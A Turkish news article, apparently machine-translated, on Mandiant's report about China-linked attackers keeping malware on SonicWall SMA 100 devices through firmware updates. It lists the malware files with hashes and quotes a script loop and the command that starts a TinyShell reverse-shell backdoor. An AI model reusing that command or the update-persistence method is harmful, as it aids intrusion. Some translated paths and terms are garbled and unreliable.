Pazartesi, Şubat 10, 2025
Ana SayfaTeknoloji HaberleriYaygın olarak kullanılan güvenlik cihazına bulaşan kötü amaçlı yazılım, üretici yazılımı güncellemelerinden...

Yaygın olarak kullanılan güvenlik cihazına bulaşan kötü amaçlı yazılım, üretici yazılımı güncellemelerinden kurtulur

Yaygın olarak kullanılan güvenlik cihazına bulaşan kötü amaçlı yazılım, üretici yazılımı güncellemelerinden kurtulur

Araştırmacılar, Çin hükümetiyle bağlantısı olan tehdit aktörlerinin, SonicWall’ın yaygın olarak kullanılan bir güvenlik cihazına, cihaz üretici yazılımı güncellemelerini aldıktan sonra bile aktif kalan kötü amaçlı yazılım bulaştırdığını söyledi.

SonicWall’ın Secure Mobile Access 100 ürünü, kuruluşların uzak iş gücünü güvenli bir şekilde dağıtmasına yardımcı olan güvenli bir uzaktan erişim cihazıdır. Müşteriler, uzak kullanıcılara ayrıntılı erişim denetimleri vermek, kuruluş ağlarına VPN bağlantıları sağlamak ve her çalışan için benzersiz profiller ayarlamak için kullanır. SMA 100’ün müşteri ağlarına erişimi, onu tehdit aktörleri için çekici bir hedef haline getiriyor.

2021’de cihaz, o zamanlar sıfırıncı gün güvenlik açığı olan bir güvenlik açığından yararlanan gelişmiş bilgisayar korsanları tarafından saldırıya uğradı. Fortinet ve Pulse Secure’un güvenlik cihazları son yıllarda benzer saldırılara maruz kaldı.

Ağlar içinde uzun vadeli kalıcılık elde etme

Perşembe günü, güvenlik şirketi Mandiant, Çin ile şüpheli bir bağlantısı olan tehdit aktörlerinin yama uygulanmamış SonicWall SMA cihazlarında kötü amaçlı yazılım çalıştırarak uzun vadeli kalıcılığı sürdürmek için bir kampanya yürüttüğünü belirten bir rapor yayınladı. Kampanya, kötü amaçlı yazılımın, ürün yazılımı yeni ürün yazılımı aldıktan sonra bile cihazlarda kalabilmesi açısından dikkate değerdi.

Mandiant araştırmacıları Daniel Lee, Stephen Eckels ve Ben Read, “Saldırganlar araçlarının kararlılığı ve kalıcılığı için önemli çaba sarf ediyor” diye yazdı. “Bu, ağa erişimlerinin ürün yazılımı güncellemeleri aracılığıyla devam etmesine ve SonicWall Cihazı aracılığıyla ağ üzerinde bir yer tutmasına izin veriyor.”

Bu kalıcılığı sağlamak için, kötü amaçlı yazılım her 10 saniyede bir mevcut üretici yazılımı yükseltmelerini kontrol eder. Bir güncelleme kullanıma sunulduğunda, kötü amaçlı yazılım arşivlenmiş dosyayı yedekleme için kopyalar, sıkıştırılmış dosyayı açar, bağlar ve ardından tüm kötü amaçlı dosya paketini ona kopyalar. Kötü amaçlı yazılım, bağlanan dosyaya bir arka kapı kök kullanıcısı da ekler. Ardından, kötü amaçlı yazılım, yüklemeye hazır olması için dosyayı yeniden sıkıştırır.

Araştırmacılar, “Teknik özellikle karmaşık değil, ancak saldırganın cihaz güncelleme döngüsünü anlamak, ardından kalıcılık için bir yöntem geliştirmek ve test etmek için büyük çaba sarf ettiğini gösteriyor” diye yazdı.

Kalıcılık teknikleri, Pulse Secure cihazlarına bulaşmak için 16 kötü amaçlı yazılım ailesini kullanan 2021’deki bir saldırı kampanyasıyla tutarlıdır. Mandiant saldırıları, şirketin “Çin hükümetinin temel önceliklerini” desteklediğini söylediği UNC2630, UNC2717 olarak izlenenler de dahil olmak üzere çok sayıda tehdit grubuna bağladı. Mandiant, SonicWall SMA 100 müşterilerine yönelik devam eden saldırıları UNC4540 olarak izlenen bir gruba bağladı.

“Son yıllarda Çinli saldırganlar, tam kurumsal izinsiz girişe giden bir yol olarak İnternet’e bakan çeşitli ağ aygıtları için birden çok sıfır gün açıklarından yararlanma ve kötü amaçlı yazılım dağıttı ve burada bildirilen örnek, Mandiant’ın devam etmesini beklediği yakın tarihli bir modelin parçası. yakın dönem,” diye yazdı Mandiant araştırmacıları Perşembe günkü raporunda.

Yüksek ayrıcalıklı erişim

Kötü amaçlı yazılımın ana amacı, oturum açmış tüm kullanıcılar için kriptografik olarak hashlenmiş parolaları çalmak gibi görünüyor. Ayrıca, tehdit aktörünün yeni kötü amaçlı yazılım yüklemek için kullanabileceği bir web kabuğu sağlar.

Araştırmacılar Perşembe günkü raporda, “Güvenliği ihlal edilmiş bir cihazın analizi, saldırganın cihaza son derece ayrıcalıklı ve erişilebilir bir erişim sağlayan bir dosya koleksiyonunu ortaya çıkardı” diye yazdı. “Kötü amaçlı yazılım, bir dizi bash betiğinden ve TinyShell varyantı olarak tanımlanan tek bir ELF ikili dosyasından oluşuyor. Kötü amaçlı bash betikleri paketinin genel davranışı, aracın ayrıntılı bir şekilde anlaşıldığını gösterir ve kararlılık ve kalıcılık sağlamak için sisteme iyi uyarlanmıştır.”

Kötü amaçlı yazılımların listesi:

Yol Doğramak İşlev
/bin/güvenlik duvarı e4117b17e3d14fe64f45750be71dbaa6 Ana kötü amaçlı yazılım süreci
/bin/httpsd 2d57bcb8351cf2b57c4fd2d1bb8f862e TinyShell arka kapısı
/etc/rc.d/rc.local 559b9ae2a578e1258e80c45a5794c071 Güvenlik duvarı için önyükleme kalıcılığı
/bin/iptabled 8dbf1effa7bc94fc0b9b4ce83dfce2e6 Yedekli ana kötü amaçlı yazılım süreci
/bin/geoBotnetd 619769d3d40a3c28ec83832ca521f521 Firmware arka kapı betiği
/bin/ifconfig6 fa1bf2e427b2defffd573854c35d4919 Zarif kapatma komut dosyası

Rapor şöyle devam etti:

Ana kötü amaçlı yazılım giriş noktası, adlı bir bash betiğidir. firewalldbirincil döngüsünü sistemdeki her dosyanın karesi için bir kez yürütür: …for j in $(ls / -R) do for i in $(ls / -R) do:… Betik, kimlik bilgilerinin çalınmasını ve diğer bileşenlerin çalıştırılmasını gerçekleştirmek için bir SQL komutunun yürütülmesinden sorumludur.

içindeki ilk işlev firewalld TinyShell arka kapısını yürütür httpsd komut ile nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 & Eğer httpsd işlem zaten çalışmıyor. Bu, TinyShell’i ters kabuk moduna ayarlayarak, yukarıda belirtilen IP adresine ve bağlantı noktasına, tarafından temsil edilen belirli bir saat ve günde çağrı yapması talimatını verir. -m tarafından tanımlanan bir işaret aralığı ile bayrak -d bayrak. İkili, IP adresi bağımsız değişkeni boş bırakılırsa ters kabuk modunda kullanılan, sabit kodlanmış bir IP adresini katıştırır. Ayrıca bir dinleme bağlama kabuğu modu da mevcuttur.

Araştırmacılar, ilk enfeksiyon vektörünün ne olduğunu bilmediklerini söylediler.

Geçen hafta SonicWall, SMA 100 kullanıcılarını 10.2.1.7 veya daha yüksek bir sürüme yükseltmeye teşvik eden bir danışma belgesi yayınladı. Bu sürümler, Dosya Bütünlüğü İzleme ve anormal işlem tanımlama gibi geliştirmeleri içerir. Yama burada mevcuttur. Kullanıcılar ayrıca, anormal girişler veya dahili trafik dahil olmak üzere güvenlik ihlali belirtileri için günlükleri düzenli olarak incelemelidir.

RELATED ARTICLES

Popüler Konular